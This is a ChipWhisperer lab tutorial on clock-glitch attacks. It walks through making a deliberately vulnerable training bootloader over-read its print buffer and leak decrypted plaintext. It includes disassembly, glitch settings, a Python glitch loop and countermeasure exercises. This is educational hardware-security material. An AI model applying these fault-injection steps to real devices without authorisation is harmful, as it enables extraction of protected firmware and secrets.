# Tutorial A7 (Glitch Buffer Attacks)

This tutorial discusses a specific type of glitch attack. It shows how a simple printing loop can be abused, causing a target to print some otherwise private information. This attack will be used to recover a plaintext without any knowledge of the encryption scheme being used.

## Firmware

This section introduces the attack concept by showing some real world examples of vulnerable firmware. Then, it describes the victim firmware that will be used in this tutorial.

### Real Firmware

Typically, one of the slowest parts of an embedded system is its communication lines. It's pretty common to see a processor running in the MHz range with a serial connection of 96k baud. To make these two different speeds work together, embedded firmware usually fills up a buffer with data and lets a serial driver print on its own time. This setup means we can expect to see code like:

```C
for(int i = 0; i < number_of_bytes_to_print; i++)
{
    print_one_byte_to_serial(buffer[i]);
}
```

This is a pretty vulnerable piece of C. Imagine that we could sneak into the source code and change it to:

```C
for(int i = 0; i < really_big_number; i++)
{
    print_one_byte_to_serial(buffer[i]);
}
```

C compilers don't care that `buffer[]` has a limited size - this loop will happily print every byte it comes across, which could include other variables, registers, and even source code. Although we probably don't have a good way of changing the source code on the fly, we do have glitches: a well-timed clock or power glitch could let us skip the `i < number_of_bytes_to_print` check, which would have the same result.

How could this be applied? Imagine that we have an encrypted firmware image that we're going to transmit to a bootloader. A typical communication process might look like:

1. We send the encrypted image ciphertexts over a serial connection
1. The bootloader decrypts the ciphertexts and stores the result somewhere in memory
1. The bootloader sends back a response over the serial port

We have a pretty straightforward attack for this type of bootloader. During the last step, we'll apply a glitch at precisely the right time, causing the bootloader to print all kinds of things to the serial connection. With some luck, we'll be able to find the decrypted plaintext somewhere in this memory dump.

### Building Firmware

For this tutorial, a very simple bootloader using the SimpleSerial protocol has been set up. The source for this bootloader can be found in `chipwhisperer/hardware/victims/firmware/bootloader-glitch`. The following commands are used:

* `pABCD\n`: Send an encrypted ciphertext to the bootloader. For example, this message is made up of the two bytes AB and CD.
* `r0\n\n\n\n\n\n`: The reply from the bootloader. Acknowledges that a message was received. No other responses are used.
* `x`: Clear the bootloader's received buffer.
* `k`: See x.

The bootloader uses triple-ROT-13 encryption to encrypt/decrypt the messages. To help you send messages to the target, the script private/encrypt.py prints the SimpleSerial command for a given fixed string. For example, the ciphertext for the string `Don't forget to buy milk!` is

```
p516261276720736265747267206762206f686c207a76797821\n
```

Now that we've got some basic knowledge of the target code, build it, then navigate to the `bootloader-glitch` firmware directory:

In [ ]:
PLATFORM = "CWLITEARM"
CRYPTO_TARGET="NONE"

In [ ]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../../hardware/victims/firmware/bootloader-glitch
make PLATFORM=$1 CRYPTO_TARGET=$2

## The Attack Plan

### The Sensitive Code

Inside `bootloader.c`, there are two buffers that are used to store most of the important data. The source code shows:
```C
#define DATA_BUFLEN 40
#define ASCII_BUFLEN (2 * DATA_BUFLEN)

uint8_t ascii_buffer[ASCII_BUFLEN];
uint8_t data_buffer[DATA_BUFLEN];
```

This tells us that there will be two arrays stored somewhere in the target's memory. The AVR-GCC compiler doesn't usually try too hard to move these around, so we can expect to find them back-to-back in memory; that is, if we can read past the end of the ASCII buffer, we'll probably find the data buffer.

Next, the code used to print a response to the serial port is:

```C
if(state == RESPOND)
{
	// Send the ascii buffer back 
	trigger_high();
	
	int i;
	for(i = 0; i < ascii_idx; i++)
	{
		putch(ascii_buffer[i]);
	}
	trigger_low();
	state = IDLE;
}
```

This looks very similar to the example code given in the previous section, so it should be vulnerable to a glitching attack. The goal is to cause the loop to continue past its regular limit: `data_buffer[0]` is the same as `ascii_buffer[80]`, so a successful glitch should dump the data buffer for us.

### Disassembly

As a final step, let's check the assembly code to see exactly what we're trying to glitch through. In the same folder as the hex file you built, open the `*.lss` file that corresponds to your target (for example, `bootloader-CWLITEARM.lss`). This is called a listing file, and it contains a bunch of debug and assembly information. Most importantly, it will allow us to easily match the source code to what's in our hex file. Search the file for something close to the vulnerable loop, such as `state == RESPOND`.

#### Compiler Optimizations

While reading the section on the bootloader commands, you may have been surprised to see more than one newline at the end of the respond command (`r0\n\n\n\n\n\n`). Because the response is both so short and always the same length, the compiler will perform loop unrolling. Loop unrolling is an optimization that trades code size for speed by replacing a constant size loop:

```C
for (int i = 0; i < 3; i++) 
    do_something();
```

by a repeated sequence of the loop's operations:

```C
do_something();
do_something();
do_something();
```

For a small number of repititions, size-speed tradeoff is skewed towards the latter, making it very hard to get the compiler not to perform the optimization, thus we simply increase the size of the loop. Most bootloaders have multiple different reponses with varying length, so this isn't a typical obstacle you would face, but it is important for this situation.

The [Wikipedia page on loop unrolling](https://en.wikipedia.org/wiki/Loop_unrolling) contains more information on the topic if you're like to learn more.

#### XMEGA Disassembly

After searching the file, you should see something like this:

```asm
 38c:	89 91       	ld	r24, Y+
 38e:	0e 94 38 02 	call	0x470	; 0x470 <output_ch_0>
 392:	f0 e2       	ldi	r31, 0x20	; 32
 394:	c4 38       	cpi	r28, 0x84	; 132
 396:	df 07       	cpc	r29, r31
 398:	c9 f7       	brne	.-14     	; 0x38c <main+0xbc>

```

This is our printing loop in assembly. It has the following steps in it:

* Look at the address `Y` and put the contents into `r24`. Increase the address stored in `Y`. (This is the i++ in the loop.)
* Call the function in location `0x470`. Presumably, this is the location of the `putch()` function.
* Compare `r28` and `r29` to `0x84` and `0x20`. Unless they're equal, go back to the top of the loop.

There's one quirk to notice in this code. In the C source, the for loop checks whether `i < ascii_idx`. However, in the assembly code, the check is effectively whether `i == ascii_idx`! This is even easier to glitch - as long as we can break past the `brne` instruction once, we'll get to the data buffer.

#### Arm Disassembly

After searching the file, you should see something like this:

```asm
 8000268:	5d28      	ldrb	r0, [r5, r4]
 800026a:	3401      	adds	r4, #1
 800026c:	f000 f8f2 	bl	8000454 <putch>
 8000270:	2c08      	cmp	r4, #8
 8000272:	d1f9      	bne.n	8000268 <main+0x64>
```

We can break this assembly down into the following steps:

* Load the character we want to print into `r0` (`r5` contains the address of `ascii_buffer`, while `r4` is our loop index `i`)
* Add 1 to `r4` (`i`)
* Call `putch`
* Compare `r4` to 8 (8 is always the value of `ascii_idx`)
* Branch back to the beginning of the loop if `r4` and 8 aren't equal

There's one quirk to notice in this code. In the C source, the for loop checks whether `i < ascii_idx`. However, in the assembly code, the check is effectively whether `i == ascii_idx`! This is even easier to glitch - as long as we can break past the `brne` instruction once, we'll get to the data buffer.

## The Attack Script

### Setup

Now that we know what our target is, we can start creating our attack script. Basic setup is the same as usual:

In [ ]:
%run "Helper Scripts/CWLite_Connect.ipynb"

In [ ]:
%run "Helper Scripts/Setup_Target_Generic.ipynb"

In [ ]:
# uncomment based on your target
#%run "Helper Scripts/Program_XMEGA.ipynb"
%run "Helper Scripts/Program_STM.ipynb"
#%run "Helper Scripts/No_Programmer.ipynb"

In [ ]:
fw_path = "../../hardware/victims/firmware/bootloader-glitch/bootloader-CWLITEARM.hex"

In [ ]:
program_target(scope, fw_path)

And setup the glitch module:

In [ ]:
scope.glitch.clk_src = 'clkgen'
scope.glitch.output = "clock_xor"
scope.io.hs2 = "glitch"
scope.glitch.trigger_src = 'ext_single'
scope.glitch.repeat = 1

#### XMEGA Settings

In [ ]:
scope.glitch.offset = -1.95
scope.glitch.width = -9.1

#### Arm Settings

In [ ]:
scope.glitch.offset = -40
scope.glitch.width = -5.5

### Communicating With Bootloader

Now that we have our setup done, let's work on communicating with the bootloader. There's a few ways to do this, but the easiest is probably to use `target.ser.write` to send our text. Remember, to get to the print buffer, we need to send some `rot13` encoded text. For this example, we'll use `Don't forget to buy milk!`, whose `rot13` encoding is `516261276720736265747267206762206f686c207a76797821`.

Let's also change the ADC clock from being x4 of the target clock to being x1. This way, we can easily use the ADC module (in particular `scope.adc.trig_count`) to see how long sending the response takes.

In [ ]:
scope.clock.adc_src = "clkgen_x1"
def send_milk(ser):
    cmd = "p516261276720736265747267206762206f686c207a76797821\n"
    ser.write(cmd)


Next, let's send the command to the bootloader, observe the response, and measure how long it took.

In [ ]:
import time
scope.glitch.output = "clock_only" #disable any glitches
scope.arm()
send_milk(target.ser)
time.sleep(0.1)
scope.capture()
num_chars = target.ser.inWaiting()
response = target.ser.read(num_chars, timeout=50)
print(response)
print("The response took {} cycles".format(scope.adc.trig_count))
scope.glitch.output = "clock_xor" #reenable glitch

In this case, we got a trigger active count of 17014 cycles. Remember, we want to glitch the final few instructions of the loop, so our glitch point will be just before the end (say somewhere in the last 50 cycles).

### Glitch Loop 

We're almost ready to create our glitch loop! Before we do, there's a few things to keep in mind. The first is dealing with crashes. As you might expect, we'll often crash the target instead of getting the glitch we want. In this case, we'll need to reset the target before we try communicating with the bootloader. Luckily we can tell if we crashed the target by looking at the state of the trigger pin: if the target crashes, it will never go low (this also happens with a successful glitch, but we'll be checking for success in the response, so this isn't much of an issue). We can check this via `scope.adc.state`.

To reset the target, we'll define a simple function. Note that you'll have to uncomment the pin setup for your target (`nrst` or `pdic`).

In [ ]:
def reset_target(scope):
    scope.io.nrst = 'low'
    #scope.io.pdic = 'low'
    time.sleep(0.05)
    scope.io.nrst = 'high'
    #scope.io.pdic = 'high'

This part is optional, but to make the response easier to read, we'll also want to do some parsing on the response text, since the response won't all be in ASCII text. This will make use of the `termcolor` module to make non letter/number responses red, which doesn't come with ChipWhisperer and only works on Jupyter/Unix. If you're following along in a Windows command prompt or don't want to install this module, feel free to remove the import and the `colored()` calls.

In [ ]:
from termcolor import colored
def my_print(text):
    for ch in text:
        if (ord(ch) > 31 and ord(ch) < 127) or ch == "\n": 
            print(ch, end='')
        else:
            print(colored("0x{:02X}".format(ord(ch)), 'red'), end='')
        print("", end='')

We can finally proceed on to our actual loop. We might need a few tries at each location, so we'll run the loop infinitely until we get it.

As was mentioned earlier, we'll also need to check for a successful glitch to avoid resetting while we're still receiving data. This will also enable us to read the full serial output, since the target will be sending back a lot of data (much more than we can receive in one `ser.read()`). 

Careful inspection of the source reveals that most of what we sent to the device is still in the `ascii_buffer` (with the first 8 or so characters being overwritten). That means we can check for one of the characters after the overwritten part (say `"7"`).

After we're sure we have a glitch, we can just keep looking for more data and printing it.

**Make sure you update the values in the `range` call to reflect what you got earlier in the tutorial**

In [ ]:
target.init()
reset_target(scope)
print("Init")
from tqdm import trange
import logging
logging.basicConfig(level=logging.CRITICAL)
while True:
    for i in range(16990, 16995, 1):
        
        if scope.adc.state:
            #trigger never went low, target probably crashed
            reset_target(scope)
            #print("Crashed!")
            
        scope.glitch.ext_offset = i
        scope.arm()
        send_milk(target.ser)
        while target.isDone() is False and timeout:
            timeout -= 1
            time.sleep(0.01)

        try:
            ret = scope.capture()
            if ret:
                reset_target(scope)
                continue
        except IOError as e:
            logging.error('IOError: %s' % str(e))
            
        waiting = target.ser.inWaiting()
        output = target.ser.read(waiting, timeout=50)
        
        #check if we were successful
        if "7" in output:
            print("Glitched! Offset was at {}".format(i))
            my_print(output)
            while True:
                waiting = target.ser.inWaiting()
                if waiting:
                    output = target.ser.read(waiting, timeout=50)
                    my_print(output)
                    
        if scope.adc.state:
            #trigger never went low, target probably crashed
            reset_target(scope)
            #print("Crashed! Output: {}".format(output))

With any luck, you should see a whole bunch of text printed to the screen.

You should be able to the plaintext near the beginning of the output! The data buffer has successfully been printed to the serial port, allowing us to see the decrypted text with no knowledge of the algorithm. Now that we've got a successful glitch, stop the cell above (since it's still looking for more stuff to print) and let's disconnect the scope and target:

In [ ]:
scope.dis()
target.dis()

## Ideas

There's a lot more that can be done with this type of attack...

### Safer Assembly Code

You may have been surprised to see that the assembly code uses a `brne` instruction to check if the loop is finished - after all, we used a less-than comparison in our C source code! Try changing this line to use a more prohibitive loop. Here's how you might do this:

### Volatile Variables

The reason why the original assembly code used the brne instruction is because GCC is an *optimizing compiler*. The compiler doesn't directly translate the C source code into assembly instructions. Instead, it tries to determine if any of the code can be modified to make it faster or more compact. For instance, consider the loop:

```C
for(int i = 0; i < 10; i++)
{
    if(i < 20)
        printf("%s", "Less");
    else
        printf("%s", "Greater");
}
```

If you take a careful look at this code, you'll notice that the following loop will produce the same output:

```C
for(int i = 0; i < 10; i++)
{
    printf("%s", "Less");
}
```

However, this second loop is smaller (less code) and faster (no conditional jumps). This is the kind of optimization a compiler can make.

There are several ways we can stop the compiler from making some of these assumptions. One of these methods uses volatile variables, which look like

```C
volatile int i;
```

A volatile variable is one that could change at any time. There could be many reasons why the value might change on us:

* Another thread might have access to the same memory location
* Another part of the computer might be able to change the variable's value (example: direct memory access)
* The variable might not actually be stored anywhere - it could be a read-only register in an embedded system

In any case, the `volatile` keyword tells the compiler to make no guarantees about this variable.

Try changing the bootloader's source code to use a volatile variable inside the loop. What happens to the disassembly? Is the loop body longer? Connect to the target board and capture a power trace. Does it look different? You'll have to find a new *Ext Trigger Offset* for the glitch module. Can you still perform the attack? Is it feasible to use this fix to avoid glitching attacks?